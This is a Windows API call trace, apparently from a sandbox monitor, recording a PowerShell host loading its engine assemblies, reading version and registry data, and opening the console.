	[0614.989] CoTaskMemFree (pv=0x0) 
	[0614.990] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xedd88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xedd80 | out: pulNumLanguages=0xedd88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xedd80) returned 1
	[0614.991] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xedd88, pwszLanguagesBuffer=0x2d92fa8, pcchLanguagesBuffer=0xedd80 | out: pulNumLanguages=0xedd88, pwszLanguagesBuffer=0x2d92fa8, pcchLanguagesBuffer=0xedd80) returned 1
	[0614.996] CoTaskMemAlloc (cb=0x24) returned 0x254c60
	[0614.996] GetUserDefaultLocaleName (in: lpLocaleName=0x254c60, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0614.996] CoTaskMemFree (pv=0x254c60) 
	[0615.832] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0615.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.833] CoTaskMemFree (pv=0x242e50) 
	[0615.835] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0615.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.835] CoTaskMemFree (pv=0x242e50) 
	[0615.837] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0615.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.837] CoTaskMemFree (pv=0x242e50) 
	[0615.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.848] SetErrorMode (uMode=0x1) returned 0x1
	[0615.848] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xeda00 | out: lpFileInformation=0xeda00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0615.848] SetErrorMode (uMode=0x1) returned 0x1
	[0615.848] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xedc70 | out: lpdwHandle=0xedc70) returned 0x94c
	[0615.850] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d96838 | out: lpData=0x2d96838) returned 1
	[0615.851] VerQueryValueW (in: pBlock=0x2d96838, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedbe8, puLen=0xedbe0 | out: lplpBuffer=0xedbe8*=0x2d968d4, puLen=0xedbe0) returned 1
	[0615.851] VerQueryValueW (in: pBlock=0x2d96838, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xedb58, puLen=0xedb50 | out: lplpBuffer=0xedb58*=0x2d969b0, puLen=0xedb50) returned 1
	[0615.851] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0615.851] CoTaskMemAlloc (cb=0x2e) returned 0x256e80
	[0615.851] lstrcpyW (in: lpString1=0x256e80, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0615.851] CoTaskMemFree (pv=0x256e80) 
	[0615.851] VerQueryValueW (in: pBlock=0x2d96838, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xedb58, puLen=0xedb50 | out: lplpBuffer=0xedb58*=0x2d96a04, puLen=0xedb50) returned 1
	[0615.851] lstrlenW (lpString="System.Management.Automation") returned 28
	[0615.851] CoTaskMemAlloc (cb=0x3c) returned 0x25e460
	[0615.851] lstrcpyW (in: lpString1=0x25e460, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0615.851] CoTaskMemFree (pv=0x25e460) 
	[0615.851] VerQueryValueW (in: pBlock=0x2d96838, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xedb58, puLen=0xedb50 | out: lplpBuffer=0xedb58*=0x2d96a60, puLen=0xedb50) returned 1
	[0615.851] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0615.852] CoTaskMemAlloc (cb=0x20) returned 0x25a940
	[0615.852] lstrcpyW (in: lpString1=0x25a940, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0615.852] CoTaskMemFree (pv=0x25a940) 
	[0615.852] VerQueryValueW (in: pBlock=0x2d96838, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xedb58, puLen=0xedb50 | out: lplpBuffer=0xedb58*=0x2d96aa0, puLen=0xedb50) returned 1
	[0615.852] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0615.852] CoTaskMemAlloc (cb=0x44) returned 0x25e460
	[0615.852] lstrcpyW (in: lpString1=0x25e460, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0615.852] CoTaskMemFree (pv=0x25e460) 
	[0615.852] VerQueryValueW (in: pBlock=0x2d96838, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xedb58, puLen=0xedb50 | out: lplpBuffer=0xedb58*=0x2d96b08, puLen=0xedb50) returned 1
	[0615.852] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0615.852] CoTaskMemAlloc (cb=0x76) returned 0x1ef660
	[0615.852] lstrcpyW (in: lpString1=0x1ef660, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0615.852] CoTaskMemFree (pv=0x1ef660) 
	[0615.852] VerQueryValueW (in: pBlock=0x2d96838, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xedb58, puLen=0xedb50 | out: lplpBuffer=0xedb58*=0x2d96ba4, puLen=0xedb50) returned 1
	[0615.852] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0615.852] CoTaskMemAlloc (cb=0x44) returned 0x25e460
	[0615.852] lstrcpyW (in: lpString1=0x25e460, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0615.852] CoTaskMemFree (pv=0x25e460) 
	[0615.853] VerQueryValueW (in: pBlock=0x2d96838, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xedb58, puLen=0xedb50 | out: lplpBuffer=0xedb58*=0x2d96c08, puLen=0xedb50) returned 1
	[0615.853] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0615.853] CoTaskMemAlloc (cb=0x58) returned 0x1a87e0
	[0615.853] lstrcpyW (in: lpString1=0x1a87e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0615.853] CoTaskMemFree (pv=0x1a87e0) 
	[0615.853] VerQueryValueW (in: pBlock=0x2d96838, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xedb58, puLen=0xedb50 | out: lplpBuffer=0xedb58*=0x2d96c84, puLen=0xedb50) returned 1
	[0615.853] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0615.853] CoTaskMemAlloc (cb=0x20) returned 0x25a940
	[0615.853] lstrcpyW (in: lpString1=0x25a940, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0615.853] CoTaskMemFree (pv=0x25a940) 
	[0615.853] VerQueryValueW (in: pBlock=0x2d96838, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xedb58, puLen=0xedb50 | out: lplpBuffer=0xedb58*=0x2d9692c, puLen=0xedb50) returned 1
	[0615.853] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0615.853] CoTaskMemAlloc (cb=0x66) returned 0x253760
	[0615.853] lstrcpyW (in: lpString1=0x253760, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0615.853] CoTaskMemFree (pv=0x253760) 
	[0615.853] VerQueryValueW (in: pBlock=0x2d96838, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xedb58, puLen=0xedb50 | out: lplpBuffer=0xedb58*=0x0, puLen=0xedb50) returned 0
	[0615.854] VerQueryValueW (in: pBlock=0x2d96838, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xedb58, puLen=0xedb50 | out: lplpBuffer=0xedb58*=0x0, puLen=0xedb50) returned 0
	[0615.854] VerQueryValueW (in: pBlock=0x2d96838, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xedb58, puLen=0xedb50 | out: lplpBuffer=0xedb58*=0x0, puLen=0xedb50) returned 0
	[0615.854] VerQueryValueW (in: pBlock=0x2d96838, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedb28, puLen=0xedb20 | out: lplpBuffer=0xedb28*=0x2d968d4, puLen=0xedb20) returned 1
	[0615.854] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0615.854] VerLanguageNameW (in: wLang=0x0, szLang=0x1f9450, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0615.854] CoTaskMemFree (pv=0x1f9450) 
	[0615.854] VerQueryValueW (in: pBlock=0x2d96838, lpSubBlock="\\", lplpBuffer=0xedb78, puLen=0xedb70 | out: lplpBuffer=0xedb78*=0x2d96860, puLen=0xedb70) returned 1
	[0615.861] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0615.861] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.861] CoTaskMemFree (pv=0x242e50) 
	[0615.863] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0615.863] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.863] CoTaskMemFree (pv=0x242e50) 
	[0615.868] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xeda48 | out: phkResult=0xeda48*=0x2fc) returned 0x0
	[0615.869] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xeda38 | out: phkResult=0xeda38*=0x300) returned 0x0
	[0615.869] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xedac8 | out: phkResult=0xedac8*=0x304) returned 0x0
	[0615.871] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xeda0c, lpData=0x0, lpcbData=0xeda08*=0x0 | out: lpType=0xeda0c*=0x1, lpData=0x0, lpcbData=0xeda08*=0x56) returned 0x0
	[0615.872] CoTaskMemAlloc (cb=0x5a) returned 0x2536f0
	[0615.872] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed9dc, lpData=0x2536f0, lpcbData=0xed9d8*=0x56 | out: lpType=0xed9dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed9d8*=0x56) returned 0x0
	[0615.872] CoTaskMemFree (pv=0x2536f0) 
	[0616.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.422] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0616.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.422] CoTaskMemFree (pv=0x242e50) 
	[0619.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0619.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0621.210] CoTaskMemAlloc (cb=0x104) returned 0x242f60
	[0621.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0621.210] CoTaskMemFree (pv=0x242f60) 
	[0621.211] CoTaskMemAlloc (cb=0x104) returned 0x242f60
	[0621.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0621.212] CoTaskMemFree (pv=0x242f60) 
	[0622.144] CoTaskMemAlloc (cb=0x104) returned 0x242f60
	[0622.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.144] CoTaskMemFree (pv=0x242f60) 
	[0622.145] CoTaskMemAlloc (cb=0x104) returned 0x242f60
	[0622.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.145] CoTaskMemFree (pv=0x242f60) 
	[0622.145] CoTaskMemAlloc (cb=0x104) returned 0x242f60
	[0622.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.145] CoTaskMemFree (pv=0x242f60) 
	[0626.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0626.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0626.132] CoTaskMemAlloc (cb=0x104) returned 0x242f60
	[0626.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.132] CoTaskMemFree (pv=0x242f60) 
	[0626.133] CoTaskMemAlloc (cb=0x104) returned 0x242f60
	[0626.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.133] CoTaskMemFree (pv=0x242f60) 
	[0627.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0627.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0635.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0635.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0639.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0639.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0648.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0648.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0655.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0655.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0656.720] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0656.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.720] CoTaskMemFree (pv=0x243180) 
	[0656.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0656.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0656.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0656.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xed720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0656.764] SetErrorMode (uMode=0x1) returned 0x1
	[0656.764] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xed9a0 | out: lpFileInformation=0xed9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0656.764] SetErrorMode (uMode=0x1) returned 0x1
	[0667.169] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0667.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0667.169] CoTaskMemFree (pv=0x243180) 
	[0667.170] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0667.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0667.170] CoTaskMemFree (pv=0x243180) 
	[0667.170] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0667.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0667.170] CoTaskMemFree (pv=0x243180) 
	[0667.172] CoCreateGuid (in: pguid=0xedd68 | out: pguid=0xedd68*(Data1=0x6e46768e, Data2=0xae5c, Data3=0x40f7, Data4=([0]=0xbd, [1]=0xbc, [2]=0x26, [3]=0x34, [4]=0x5a, [5]=0x85, [6]=0xc7, [7]=0x27))) returned 0x0
	[0667.175] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0667.175] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0667.175] CoTaskMemFree (pv=0x243180) 
	[0667.178] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0667.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0667.178] CoTaskMemFree (pv=0x243180) 
	[0667.181] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0667.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0667.181] CoTaskMemFree (pv=0x243180) 
	[0667.192] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0669.135] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xeda10 | out: lpConsoleScreenBufferInfo=0xeda10) returned 1
	[0669.155] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0669.156] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xeda10 | out: lpConsoleScreenBufferInfo=0xeda10) returned 1
